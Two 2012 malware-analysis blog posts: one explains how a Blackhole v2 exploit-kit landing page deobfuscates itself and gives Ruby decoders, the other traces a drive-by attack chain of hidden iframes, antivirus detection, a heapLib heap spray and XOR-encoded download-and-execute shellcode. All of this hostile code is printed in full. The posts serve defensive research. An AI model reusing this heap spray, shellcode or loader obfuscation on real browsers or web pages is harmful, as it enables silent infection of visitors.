Thursday, October 18, 2012

Blackhole v2 Deobfuscation from Ruby Perspective

Throughout this post, credit goes to Hooked on Mnemonics.

In this post we go through a quick explanation of the Blackhole v2 JavaScript obfuscation and how to deobfuscate it with Ruby. Keep in mind that the obfuscation code changes a bit from time to time, so the Ruby code will need adjusting as well; take note of any changes in the obfuscation code you come across.

JavaScript Obfuscation

<html><head><title></title></head><body><div dqa="asd"></div><applet archive="hxxp://kennedyana.ru:8080/forum/links/column.php?xlkuwces=0837090803&ysxk=3b42&jtaziv=wqur&coqs=wyfelia" code="gbegbewewb"><param name="ui&#0000100;" value='0&#48;&#98;&#48;&#57;&#48;&#57;&#48;&#52;&#49;&#102;&#51;&#49;&#51;&#49;&#49;&#49;&#51;&#53;&#51;&#97;&#51;&#97;&#51;&#53;&#48;&#48;&#49;&#101;&#49;&#97;&#51;&#97;&#49;&#97;&#51;&#99;&#52;&#52;&#50;&#49;&#49;&#102;&#49;&#56;&#49;&#99;&#49;&#56;&#49;&#99;&#51;&#49;&#50;&#99;&#49;&#55;&#52;&#52;&#50;&#49;&#50;&#51;&#51;&#49;&#52;&#51;&#51;&#50;&#51;&#97;&#49;&#49;&#49;&#57;&#51;&#49;&#51;&#56;&#49;&#55;&#52;&#51;&#50;&#49;&#50;&#51;&#51;&#97;&#51;&#99;&#48;&#52;&#48;&#98;&#48;&#52;&#51;&#100;&#50;&#51;&#50;&#99;&#51;&#57;&#49;&#99;&#49;&#56;&#48;&#56;&#50;&#57;&#49;&#99;&#51;&#101;&#49;&#99;&#49;&#56;&#49;&#99;&#48;&#56;&#48;&#50;&#50;&#51;&#51;&#53;&#51;&#57;&#48;&#56;&#48;&#56;&#49;&#99;&#50;&#57;&#49;&#99;&#51;&#101;&#48;&#56;&#50;&#57;&#48;&#56;&#49;&#56;&#49;&#99;&#50;&#57;&#49;&#99;&#50;&#57;&#48;&#56;&#51;&#52;&#49;&#99;&#51;&#52;&#49;&#99;&#50;&#56;&#48;&#50;&#51;&#97;&#51;&#57;&#49;&#99;&#50;&#55;&#48;&#50;&#49;&#50;&#51;&#54;&#51;&#57;&#49;&#97;&#48;&#50;&#48;&#97;&#50;&#51;&#51;&#57;&#49;&#57;'/></applet><script>dd="div";asd=function(){a=a.replace(/[^012a-z3-9]/g,"");};ss=String.fromCharCode</script><div 12="131a1r1h([email protected]&3i3l1f3j3f+3o3a3c3h3m%1d3a1u1313)1d391d351d#3g1s393i3l*19391u1h1s!391t341f3f^383h3a3n3b_1s391c1c1a$3u3g1u342t([email protected]&3n3c3i3h40+403a1s351u%342t39301f)3h343g3840#403a1s3c39*19193b1f3n!383m3n193g^1a17171912_374040371f$3n383m3n19([email protected]&3n253" 3="3s#3j383i3911*351u1u133m!3n3l3c3h3a^131717191g_2u371g1a1f$3n383m3n19([email protected]&3g2k383a3r+1r1g2t2u37%302t2u372u)1f2u321d1e#301b1g1d3m*3j3f3c3n2g!3o3g2k383a^3r1r1g2t2u_1f2u321d1e$301g3a1d3a([email protected]&3n3c3i3h19+351d361a3u%3p343l1137)1u3n3b3c3m#1d341u371f*3c3m2l3n3l!2g3o3g1935^" 
21="h36)3n3c3i3h19#381d351d37*1a3u3p343l!11341d361s^3c3919381a_3u3c391938$2t352t1h30([email protected]&3i3l19341u+1h1s341t35%1f3f383h3a)3n3b1s341u#341c1j1a3u*382t352t34!30301u352t^341c1i3041_41393i3l19$34113c3h11([email protected]&3c39193617+17362t352t%1h30301u1u)1i1a3u3n3b#3c3m1f3c3h*3c3n2h353d"

......

33="!2u1f212u37^1b1a1g3c1a_1f3n383m3n$193c1a1s36([email protected]&361f3c3m2h+3j383l3417%1719191g2o)383l3m3c3i#3h2u3m1b2u*1g2u3m1b19!2u371c2u1f^212u371b1a_1g3c1a1f3n$383m3n193c([email protected]&38283f3i34+3n192k383a%273r3j1f15)1i1d1i1h1a#1r3h3o3f3f*1s361f3437!372p3c3h27^3p383h3n19_133f3i3437$13" 79="83m36+3l3c3j3n3c%3i3h1a4040)371f3a383n#2g3o3g1935*1f3h343g38!1a1s3b1u37^1f3a383n2i_3f3o3a3c3h$283c3f382o([email protected]&1a1s3c3919+123b171737%1f2h2l1u1u)1i1a3u3c39#193a1f3j3f*3o3a3c3h2a!343m2f3c3g^382m3s3j38_19351d1334$3j3j3f3c36([email protected]&34373i3538+1f3j37393r%3g3f131d34)1a1a3u3b"></div><script>

if(020==0x10)a=document.getElementsByTagName(dd)[1];
s="";
for(i=0;;i++){
        if(window.document)r=a.getAttribute(i);
        if(r){s=s+r;}else break;
}
a=s;
asd();
s="";
for(i=0;i<a.length;i+=2){
        s+=ss(parseInt(a.substr(i,2),31));
}
c=s;
e=window["ev"+"a"+"l"];
try{("321".substr+"zxc")();}catch(gdsgdsg){e(c);}
</script></body></html>

The snippet above is a normal Blackhole v2 landing page that feeds a suitable exploit to each visitor. We'll focus on the code between <script> and </script>. In general, the JavaScript deobfuscates itself as follows:

1) Get the 2nd <div> element in the HTML page (dd is "div", set in the first <script>, so this is getElementsByTagName("div")[1], the one after <div dqa="asd">):

a=document.getElementsByTagName(dd)[1]

2) Loop over the attributes of that <div> named "0", "1", "2", ... and concatenate their values. Note that the values are joined in numeric order of the attribute name, not in the order they appear in the HTML, and the loop stops at the first index for which no attribute exists:

for(i=0;;i++){
        if(window.document)r=a.getAttribute(i);
        if(r){s=s+r;}else break;
}

3) Strip every character that is not [0-9a-z] from the concatenated value (the class [^012a-z3-9] is just [^0-9a-z] written oddly); the punctuation sprinkled through the attribute values is noise:

asd(); OR asd=function(){a=a.replace(/[^012a-z3-9]/g,"");};

4) Take the cleaned string two characters at a time, parse each pair as a base-31 integer, and turn that integer into a character with String.fromCharCode:

for(i=0;i<a.length;i+=2){
        s+=ss(parseInt(a.substr(i,2),31));
}

5) Lastly, eval the string built in step 4. The try block always throws (a string's substr method concatenated with "zxc" is a string, and calling a string is a TypeError), so the catch branch runs window.eval on the decoded code:

e=window["ev"+"a"+"l"];
try{("321".substr+"zxc")();}catch(gdsgdsg){e(c);}

Deobfuscating with ruby

To deobfuscate the code above with Ruby, we can use pattern matching on the attributes of the <div> tag. Previous samples I've seen used <div d01="blabla" d03="blabla" d02="blabla" ...>, and most current samples use <div 1="blabla" 3="blabla" 2="blabla" ...>. So for now I use the regex /\s(\d{1,2})\=\"(.*?)\"/. It might not work on every sample; tweak the regex as required.

#!/usr/bin/ruby
# Blackhole v2 <div> deobfuscator. Mirrors the JavaScript above: join the
# numeric attributes of the <div> in numeric order, strip everything
# outside [0-9a-z], then turn each 2-character base-31 pair into a
# character, as parseInt(pair, 31) + String.fromCharCode do.

base = 31
content = File.read("test.lala")

# Attribute names are small integers (<div 1="..." 3="..." 2="...">);
# adjust the regex for samples that name them differently (d01=, d02=, ...).
attribs = content.scan(/\s(\d{1,2})="(.*?)"/)

# Sort by the numeric attribute name, since the JavaScript reads
# getAttribute(0), getAttribute(1), ... in that order, not document order.
code = attribs.sort_by { |name, _| name.to_i }.map { |_, value| value }.join

code.gsub!(/[^012a-z3-9]/, '')   # same character class as asd() in the sample

# Two characters at a time, base 31 -> character. chr(Encoding::UTF_8)
# accepts code points above 255, which a bare .chr would reject.
deobf = ''
code.scan(/..?/) { |pair| deobf << pair.to_i(base).chr(Encoding::UTF_8) }

File.open("lala.html", "w") { |f| f.write(deobf) }


Deobfuscation for show_pdf2

After deobfuscating the JavaScript above, we get the links that download the PDF exploit. Most of the parameters in the URL that downloads the Blackhole v2 PDF exploit are encoded with the x() function below: each character becomes (charCode - 46) written as two hex digits;

function x(s){d=[];for(i=0;i<s.length;i++){k=(s.charCodeAt(i)-46).toString(16);if(k.length==1)k="0"+k;d.push(k);};return d.join("");}

show_pdf2("hxxp://kennedyana.ru:8080/forum/links/column.php?mkih="+x("6e761")+"&itv="+x("n")+"&uqtfl=3307093738070736060b&yocom="+x(pdfver.join(".")))

Below is the equivalent encoder in Ruby. As a check, x("6e761") gives 0837090803, the same value that appears as the xlkuwces parameter in the applet archive URL of the first sample above, and with the hard-coded pdfver x("9.1.1.1") gives 0b000300030003, the Reader version that is reported back to the server;

#!/usr/bin/ruby
# Ruby port of the x() helper above: every character becomes
# (charCode - 46) written as two lowercase hex digits.

# The JavaScript reads the real Reader version from the browser plugin;
# here it is hard-coded to the version seen in the sample.
pdfver = [9, 1, 1, 1]

def x(str)
  # each_char rather than each: String#each no longer exists in Ruby 1.9+
  str.each_char.map do |c|
    (c.ord - 46).to_s(16).rjust(2, '0')   # zero-pad, as k = "0" + k does
  end.join
end

puts "hxxp://kennedyana.ru:8080/forum/links/column.php?mkih=" + x("6e761") +
     "&itv=" + x("n") + "&uqtfl=3307093738070736060b&yocom=" + x(pdfver.join("."))

Friday, October 12, 2012

51la Malware Embedded Attack

Early this morning, while doing normal stuff in front of my laptop, I stumbled upon a URL which I had a feeling might be malicious: wbtg.51872210.com/ywtcpm120921/8ace3ds3f4fb.html. Lucky for me (I guess), the URL was still alive and I was able to download its content.

The Redirection

After fetching the content of 8ace3ds3f4fb.html, I concentrated on the portions that might contain malicious embedded code (such as redirections, iframes or JavaScript). And yes, it has some JavaScript embedded, but the one I'm interested in is index.js:

...
Snip
...
</BODY></HTML><script src="hxxp://s11.cnzz.com/stat.php?id=4581253&web_id=4581253" language="JavaScript"></script>
<script type="text/javascript" src="index.js" ></script>

Looking into index.js, the code writes an iframe to another URL, hxxp://wmb.5151lp.com/kk.html. The hex-escaped string decodes to "360SafeLive.Update": the script tries to instantiate that ActiveX control and only writes the iframe when the attempt fails and the User-Agent contains neither "360se" nor "msie 9", so visitors with 360 Safe or IE9 are left alone.

var bOwa = navigator.userAgent.toLowerCase();

try {
   var s;
   var ss=new ActiveXObject("\x33\x36\x30\x53\x61\x66\x65\x4C"+"\x69\x76\x65\x2E"+"\x55\x70\x64\x61\x74\x65");
}
catch(s){};
finally {
   if((s=="[object Error]") && (bOwa.indexOf("360se")==-1) && (bOwa.indexOf("msie 9")==-1)) {
        document.write("<iframe src=hxxp://wmb.5151lp.com/kk.html width=116 height=1></iframe>");
   }
}

From hxxp://wmb.5151lp.com/kk.html, I got an obfuscated JS file (PASTEBIN):

<script>var ckabc=eval;try{alert(a,b,c);}catch(e){ckabc(function(/*ck vip*/p,/*ck vip*/a,/*ck vip*/c,/*ck vip*/k,/*ck vip*/e,/*ck vip*/d/*ck vip*/){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];

...

(t);',62,216,'||||||||||var|out||str||len|charCodeAt|case||length||return|if||c3|||c4|||0xff|||while|||break|sum|c2|String|fromCharCode|nbChar|0xffffffff|63||function|char2|mx|c1||AVgHbu2f|do|X3cQCMIIF|||ErTiUlaxlkP|delta|char3|6b|join|0x3F|BMOYPRD4H|||||||||||str2long|for|61|vl|74|65|key|nbencode|52|GIEMslIELDjE|nbcode|NtCion|utf8to16|long2str|sl|false|MYKEY|57|62|Array|53|55|54|

...

|8LtGCo1KTBLkuLxBQxwKwUi0hC9WGI30Ll3WuvTUI2lqsUhOFxzclRfbQgCTIwjifli1q|||||||||||AJvzvYnS37tvhGB0Q8wXKpaJI|HplD80sXTFEoEZ|DPwUqt|2V8ivu9Y13m9nqQSg8rN|fOvmYQvkBXXNmtdcp7swtEf6WWz8DKZ5FULCIY9SUbv2qHZHT3fYj9E7M8wQ6gSsDCLMmkMo3TAyosj3rGqkCnNzuPymVGb9|GguYcZXhH8iz4CLJQrAcSJovghxKiIzXzUyiHyMDzW4N7wNEOE9oVabADxVEkSCC0cqxefhZiOzzebb1sFukgfgdohewLv90P|window|43|IJGbt5Bd8HhsU982|Um6ZS0Ntts|YcoQQAxsZ5TtTZ0Vm6RZ8qIMdPieVQjLVQaG6ZqLBuzR33p|JzznFVHaUz4kVs38VjlAmdjYoGQYyUVycKOS|8itFIvCwP1Fq7AzILaHEyt9sVB8DPZBl|Vb0VwMO|kn0|D20GWWbGli3C9wTOHftmKvHHjBalZiqDWrBLST4jp|HZfPtBoR|AxvlyDenPYzIKN|SCYZ7|eS5av9AYyYaMB7ZkK8JRp50jBCFQRm8XSZJvJkDhtbGs7B9jYByhTaX'.split('|'),0,{}))}</script>

When it comes to obfuscated JS code, I've been using manual analysis plus SpiderMonkey from the beginning. After finding out about JSDetox a few weeks ago, I must say that manual analysis with JSDetox has become quite handy at times, especially when manually tracking variable values and deobfuscating JS code at the DOM level.

The obfuscated code above has multiple layers of obfuscation, but with JSDetox I use "Send to Analyze" and execute once more. From there I get deobfuscated JS code (PASTEBIN) with an iframe to cc.html. Along with the iframe, it also checks whether ksafe, Kingsoft Antivirus, 360QBack, 360safe and NOD32 are installed, and not other major AVs; I have no idea why, I suspect they're trying to check whether fake AV is installed. The check relies on IE's res:// protocol: each entry loads a resource (a BMP, PNG or GIF by ordinal) out of a local executable as an Image, and the onerror handler only fires when that file does not exist, so a load that does not error reveals an installed product, makes ckrav() return 1 and suppresses the iframe:

function ckrav(){
  var EasGXqAf1 = ['res://C:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://D:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://E:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://F:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://C:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://D:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://E:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://F:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://C:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://D:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://E:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://F:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://C:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://D:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://E:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://F:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://C:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171', 'res://D:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171', 'res://E:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171', 'res://F:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171'];

  for(i = 0; i < EasGXqAf1["length"]; i++) {
    ischeck = 1;
    x = new Image();
    x["src"] = "";
    x["onerror"] = function() {
      ischeck = 0;
    };
    x["src"] = EasGXqAf1[i];
    if(ischeck == 1) {
      return 1;
    }
    delete x;
  }
  return 0;
}

if(!ckrav()) {
  document.write("<iframe src=cc.html width=116 height=1></iframe>");
}

Following the content of hxxp://wmb.5151lp.com/cc.html, the code contains another iframe, ppp.html, and an external JS file from a 51.la URL. I had actually read about the 51la malware previously on Donovan's blog post, but I still didn't get what it (the 51la malware) actually does. However, according to his latest post, Norman Lab has confirmed its maliciousness.

Below is the content of cc.html. It sets a cookie (ck006) that expires after one hour, so a visitor is only served the iframe once per hour, and it writes the ppp.html iframe only when the User-Agent contains "msie":

<script language="JavaScript">
function lovexckwm(){
   var ckxo = navigator.userAgent.toLowerCase();
   var polo = new String(document.cookie);
   var colo = "ck006=";
   var cksun = polo.indexOf(colo);

   if (cksun == -1)
   {
       var osome = new Date();
       osome.setTime(osome.getTime()+1*60*60*1000);
       document.cookie = "ck006=yes;expires=" + osome.toGMTString();

       if(ckxo.indexOf("msie")>0)
       {
          document.write("<iframe src=ppp.html width=60 height=1></iframe>");
       }
   }
}
lovexckwm();
</script>

<script language="javascript" type="text/javascript" src="http://js.users.51.la/14908642.js"></script>


The Exploitation

I downloaded ppp.html and 14908642.js from the two URLs inside cc.html.

The content of 14908642.js (PASTEBIN) is similar to what Donovan described in his blog post, which raised our suspicion about why the <img> has an .asp extension in its src attribute.

Moving to ppp.html, I got a heavily obfuscated JS file, which I analyzed manually with JSDetox to strip the script from the HTML tags (beautified version in PASTEBIN). In the beautified version I identified two parts: (1) an obfuscation using a packed function, (2) the heapLib exploitation library developed by Alexander Sotirov.

The Shellcode

Since heapLib.js needs shellcode to deliver the payload, I'm pretty sure it resides in the obfuscated part. By deobfuscating the first part of the code (PASTEBIN), I found the obfuscated shellcode together with another copy of the heapLib library.

From there, I deobfuscated the shellcode and got the following. The ckckckckckckckck() helper inserts the marker cgTw6 before every four hex digits of the dynamically built part, and the replace() at the bottom turns every cgTw6 back into %u, so the string is ordinary %uXXXX-escaped shellcode:

<script>
function ckckckckckckckck(__){var _='';for(var ___=0;___<__['length'];___+=4){_+='cgTw6'+__.substr(___,4);} return _;}

var x1 = new Array, x2 = '', x3;

for(var i=0;i<ss.length;i++ ){x1[i]=ss[i]-38;x2+=x1[i].toString(16);}
x3 = ckckckckckckckck(x2);
var Abqj6 = '%'+'u';
var ckwmckwm = Abqj6+'90'+'90'+Abqj6+'90'+'90'+Abqj6+'5858'+'cgTw65858cgTw610EBcgTw64B5BcgTw6C933cgTw6B966cgTw603B8cgTw63480cgTw6BD0BcgTw6FAE2cgTw605EBcgTw6EBE8'+'cgTw6FFFF'+Abqj6+'54FFcgTw6BEA3'+'cgTw6bdbdcgTw6D9E2'+'cgTw68D1CcgTw6BDBDcgTw636BDcgTw6B1FDcgTw6CD36cgTw610A1cgTw6D536'+'cgTw636B5cgTw6D74AcgTw6E4ACcgTw60355cgTw6BDBF'+'cgTw62DBDcgTw6455F'+'cgTw68ED5'+'cgTw6'+'BD8F'+'cgTw6D5BDcgTw6CEE8cgTw6CFD8cgTw636E9cgTw6B1FBcgTw60355cgTw6BDBCcgTw636BDcgTw6D755cgTw6E4B8cgTw62355'+'cgTw6BDBF'+'cgTw65FBDcgTw6D544cgTw6D3D2cgTw6BDBDcgTw6C8D5cgTw6D1CFcgTw6E9D0cgTw6AB42cgTw67D38cgTw6AEC8cgTw6D2D5cgTw6BDD3cgTw6D5BDcgTw6CFC8cgTw6D0D1cgTw636E9cgTw6B1FBcgTw63355cgTw6BDBCcgTw636BDcgTw6D755cgTw6E4BCcgTw6D355cgTw6BDBFcgTw65FBDcgTw6D544'+'cgTw68ED1'+'cgTw6BD8FcgTw6CED5cgTw6D8D5'+Abqj6+'E9D1cgTw6FB36cgTw655B1cgTw6BCD2cgTw6BDBDcgTw65536cgTw6BCD7cgTw655E4cgTw6BFF2cgTw6BDBDcgTw6445FcgTw6513CcgTw6BCBDcgTw6BDBDcgTw66136cgTw67E3CcgTw6BD3DcgTw6BDBDcgTw6BDD7cgTw6A7D7cgTw6D7EEcgTw642BDcgTw6E1EBcgTw67D8EcgTw63DFDcgTw6BE81'+'cgTw6C8BD'+'cgTw67A44cgTw6BEB9cgTw6D6E1cgTw6D893cgTw6F97AcgTw6B9BEcgTw6D8C5cgTw6BDBDcgTw6748EcgTw6ECECcgTw6EAEEcgTw68EECcgTw6367DcgTw6E5FBcgTw69F55cgTw6BDBCcgTw63EBDcgTw6BD45cgTw638B2cgTw6BD68cgTw6BDBDcgTw6BDD7cgTw6BDD7cgTw6BED7cgTw6BDD7cgTw6BFD7cgTw6BDD5cgTw6BDBDcgTw6EE7DcgTw6FB36cgTw65599cgTw6BCBCcgTw6BDBDcgTw6FB34cgTw6D7DDcgTw6EDBDcgTw6EB42cgTw63495cgTw6D9FBcgTw6FB36cgTw6D7DDcgTw6D7BDcgTw6D7BDcgTw6D7BDcgTw6D7B9cgTw6EDBDcgTw6EB42cgTw6D791cgTw6D7BDcgTw6D7BDcgTw6D5BDcgTw6BDA2cgTw6BDB2cgTw642EDcgTw681EBcgTw6FB34cgTw636C5cgTw6D9F3cgTw6C13DcgTw642B5cgTw6C91FcgTw63DB1cgTw6B5C1'+'cgTw6BD42'+'cgTw6B8C9'+'cgTw6C93DcgTw642B5'+'cgTw65F1F'+'cgTw63456'+'cgTw63D3BcgTw6BDBDcgTw67ABDcgTw6CDFBcgTw6BDBDcgTw6BDBDcgTw6FB7AcgTw6BDC9cgTw6BDBDcgTw6D7BDcgTw6D7BDcgTw6D7BDcgTw636BDcgTw6DDFBcgTw642EDcgTw685EBcgTw63B36cgTw6BD3DcgTw6BDBDcgTw6BDD7cgTw6F330cgTw6ECC9cgTw6CB42cgTw6EDCDcgTw6CB42cgTw642DDcgTw68DEBcgTw6CB42'+'cgTw642DDcgTw689EBcgTw6CB42cgTw642C5cgTw6FDEBcgTw64636cgTw67D8EcgTw6668EcgTw6513Ccg
Tw6BFBDcgTw6BDBDcgTw67136cgTw6453EcgTw6C0E9cgTw634B5cgTw6BCA1cgTw67D3EcgTw656B9cgTw6364EcgTw63671cgTw63E64cgTw6AD7EcgTw67D8EcgTw6ECEDcgTw6EDEEcgTw6EDEDcgTw6EDED'+'cgTw6EAED'+'cgTw6EDEDcgTw6EB42cgTw636B5cgTw6E9C3cgTw6AD55cgTw6BDBCcgTw655BDcgTw6BDD8cgTw6BDBDcgTw6DED5cgTw6CACBcgTw6D5BDcgTw6D5CEcgTw6D2D9cgTw636E9cgTw6B1FBcgTw69955cgTw6BDBDcgTw634BDcgTw681FBcgTw61CD9cgTw6BDB9cgTw6BDBDcgTw61D30cgTw642DDcgTw64242cgTw6D8D7cgTw6CB42cgTw63681cgTw6ADFBcgTw6B555cgTw6BDBD'+'cgTw68EBDcgTw6EE66cgTw6EEEEcgTw642EEcgTw63D6DcgTw65585cgTw6853DcgTw6C854cgTw63CACcgTw6B8C5cgTw62D2DcgTw62D2DcgTw6B5C9cgTw64236cgTw636E8cgTw63051cgTw6B8FDcgTw65D42cgTw61B55cgTw6BDBDcgTw67EBDcgTw61D55cgTw6BDBDcgTw605BDcgTw6BCACcgTw63DB9cgTw6B17FcgTw655BD'+'cgTw6BD2EcgTw6BDBDcgTw6513CcgTw6BCBDcgTw6BDBDcgTw64136cgTw67A3EcgTw67AB9cgTw68FBAcgTw62CC9cgTw67AB1cgTw6B9FAcgTw634DEcgTw6F26CcgTw6FA7AcgTw61DB5cgTw62AD8cgTw67A76cgTw6B1FAcgTw6FDECcgTw6C207cgTw6FA7AcgTw683ADcgTw60BA0cgTw67A84'+Abqj6+'A9FAcgTw6D405'+'cgTw6A669cgTw6FA7AcgTw603A5cgTw6DBC2cgTw67A1DcgTw6A1FAcgTw61441cgTw6108AcgTw6FA7AcgTw6259DcgTw6ADB7cgTw6D945cgTw68D1CcgTw6BDBDcgTw636BDcgTw6B1FDcgTw6CD36cgTw610A1cgTw6D536cgTw636B5cgTw6D74AcgTw6E4B9cgTw6E955cgTw6BDBDcgTw62DBDcgTw6455FcgTw68ED5'+'cgTw6BD8FcgTw6D5BDcgTw6CEE8cgTw6CFD8cgTw636E9cgTw655BBcgTw642E8cgTw64242cgTw65536cgTw6B8D7cgTw655E4cgTw6BD88cgTw6BDBDcgTw6445FcgTw6428EcgTw642EAcgTw6B9EBcgTw6BF56cgTw67EE5cgTw64455cgTw64242cgTw6E642cgTw6BA7BcgTw63405cgTw6BCE2cgTw67ADBcgTw6B8FAcgTw65D42cgTw6EE7EcgTw66136cgTw6D7EEcgTw6D5FDcgTw6ADBDcgTw6BDBDcgTw636EA'+'cgTw69DFBcgTw6A555cgTw64242cgTw6E542cgTw6EC7EcgTw636EBcgTw681C8cgTw6C936cgTw6C593cgTw648BEcgTw636EBcgTw69DCBcgTw648BEcgTw6748EcgTw6FCF4cgTw6BE10cgTw68E78cgTw6B266'+'cgTw6AD03cgTw66B87cgTw6B5C9cgTw6767CcgTw6BEBAcgTw6FD67cgTw64C56cgTw6A286cgTw65AC8cgTw636E3cgTw699E3cgTw660BEcgTw636DBcgTw6F6B1cgTw6E336cgTw6BEA1cgTw63660cgTw636B9cgTw678BEcgTw6E316cgTw67EE4cgTw66055cgTw64241cgTw60F42cgTw65F4FcgTw68449'+'cgTw6C05FcgTw6673EcgTw6C6F5cgTw68F80cgTw62CC9cgTw638B1cgTw61262
cgTw6DE06cgTw66C34cgTw6ECF2cgTw607FDcgTw61DC2cgTw62AD8cgTw6A376cgTw6D919cgTw62E52cgTw6598FcgTw63329cgTw6B7AEcgTw67F11cgTw6F6A4cgTw679BCcgTw6A230cgTw6EAC9cgTw6B0DBcgTw6FE42cgTw61103'+'cgTw6C066cgTw6184DcgTw6EF27cgTw61A43cgTw68367cgTw60BA0cgTw60584'+Abqj6+'69D4cgTw603A6cgTw6DBC2cgTw6411DcgTw68A14cgTw62510cgTw6ADB7cgTw63D45cgTw6126BcgTw64627'+Abqj6+'A8EE'+x3+'cgTw6C3C3';

var code = unescape(ckwmckwm.replace(/cgTw6/g,Abqj6));
var nops = unescape("%"+"u0c0"+"c"+"%"+"u0c0"+"c");
var nops_90 = unescape("%"+"ub3d6"+"%"+"u4f92");

while (nops.length < 0x80000) nops += nops;
while (nops_90.length < 0x80000) nops_90 += nops_90;
var offset = nops.substring(0, 0x100);
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);

The shellcode is XOR-encoded. Using Malzilla, I managed to get the XOR key, which is "BD". The key is also readable from the decoder stub at the start of the blob: %u3480%uBD0B%uFAE2 are the bytes 80 34 0B BD E2 FA, i.e. xor byte ptr [ebx+ecx], 0BDh followed by a loop back to it. From there it is a normal download-and-execute payload that fetches ttxz.txt from the same server (the urlmon, User32 and shell32 strings and the URL are visible in the decoded bytes below). The name implies a text file, but it is in fact a data file.

00000000  2d 2d 2d 2d e5 e5 e5 e5  56 ad e6 f6 8e 74 db 04  |----....V....t..|
00000010  05 be 3d 89 b6 00 5f 47  56 b8 55 56 42 42 42 e9  |..=..._GV.UVBBB.|
00000020  1e 03 00 00 5f 64 a1 30  00 00 00 8b 40 0c 8b 70  |...._d.0....@..p|
00000030  1c ad 8b 68 08 8b f7 6a  11 59 e8 be 02 00 00 90  |...h...j.Y......|
00000040  e2 f8 68 33 32 00 00 68  55 73 65 72 54 8b 46 0c  |..h32..hUserT.F.|
00000050  e8 be 01 00 00 8b e8 6a  05 59 e8 9e 02 00 00 e2  |.......j.Y......|
00000060  f9 68 6f 6e 00 00 68 75  72 6c 6d 54 ff 16 85 c0  |.hon..hurlmT....|
00000070  75 13 68 6f 6e 00 00 68  75 72 6c 6d 54 8b 46 0c  |u.hon..hurlmT.F.|
00000080  e8 8e 01 00 00 8b e8 6a  01 59 e8 6e 02 00 00 e2  |.......j.Y.n....|
00000090  f9 68 6c 33 32 00 68 73  68 65 6c 54 8b 46 0c e8  |.hl32.hshelT.F..|
000000a0  6f 01 00 00 8b e8 6a 01  59 e8 4f 02 00 00 e2 f9  |o.....j.Y.O.....|
000000b0  81 ec 00 01 00 00 8b dc  81 c3 80 00 00 00 6a 00  |..............j.|
000000c0  6a 1a 53 6a 00 ff 56 5c  33 c0 40 80 3c 03 00 75  |j.Sj..V\3.@.<..u|
000000d0  f9 c7 04 03 5c 6b 2e 65  c7 44 03 04 78 65 00 00  |....\k.e.D..xe..|
000000e0  33 c9 51 51 53 57 51 33  c0 8b 46 58 e8 22 01 00  |3.QQSWQ3..FX."..|
000000f0  00 83 f8 00 0f 85 d5 00  00 00 6a 00 6a 00 6a 03  |..........j.j.j.|
00000100  6a 00 6a 02 68 00 00 00  c0 53 8b 46 24 e8 01 01  |j.j.h....S.F$...|
00000110  00 00 89 46 60 6a 00 50  ff 56 28 89 46 64 8b 46  |...F`j.P.V(.Fd.F|
00000120  60 6a 00 6a 00 6a 00 6a  04 6a 00 50 ff 56 2c 6a  |`j.j.j.j.j.P.V,j|
00000130  00 6a 00 6a 00 68 1f 00  0f 00 50 ff 56 3c 89 46  |.j.j.h....P.V<.F|
00000140  78 8b 4e 64 80 7c 08 ff  a2 74 0c 80 7c 08 ff 00  |x.Nd.|...t..|...|
00000150  74 05 80 74 08 ff a2 e2  eb 89 86 80 00 00 00 c7  |t..t............|
00000160  46 70 00 00 00 00 c7 46  74 00 00 00 00 6a 00 6a  |Fp.....Ft....j.j|
00000170  00 6a 00 8b 46 60 50 ff  56 38 8b 86 80 00 00 00  |.j..F`P.V8......|
00000180  6a 00 8d 4e 74 51 ff 76  70 50 ff 76 60 ff 56 30  |j..NtQ.vpP.v`.V0|
00000190  ff 76 60 ff 56 34 ff 76  78 ff 56 40 8b fb 33 c0  |.v`.V4.vx.V@..3.|
000001a0  33 db 81 ec 00 02 00 00  8b cc 83 f8 54 7d 08 89  |3...........T}..|
000001b0  1c 01 83 c0 04 eb f3 8b  cc 8b d9 83 c3 10 33 c0  |..............3.|
000001c0  50 51 53 50 50 50 50 50  50 57 50 50 ff 56 08 8b  |PQSPPPPPPWPP.V..|
000001d0  7e 54 e8 10 01 00 00 e8  65 00 00 00 68 63 76 77  |~T......e...hcvw|
000001e0  00 68 73 68 64 6f 54 8b  46 0c e8 24 00 00 00 89  |.hshdoT.F..$....|
000001f0  46 3c 64 a1 04 00 00 00  8d a0 60 ff ff ff 6a 65  |F<d.......`...je|
00000200  ff 76 3c 8b 46 10 e8 08  00 00 00 33 db 53 53 53  |.v<.F......3.SSS|
00000210  53 ff d0 80 38 e8 80 38  e9 75 11 81 78 05 90 90  |S...8..8.u..x...|
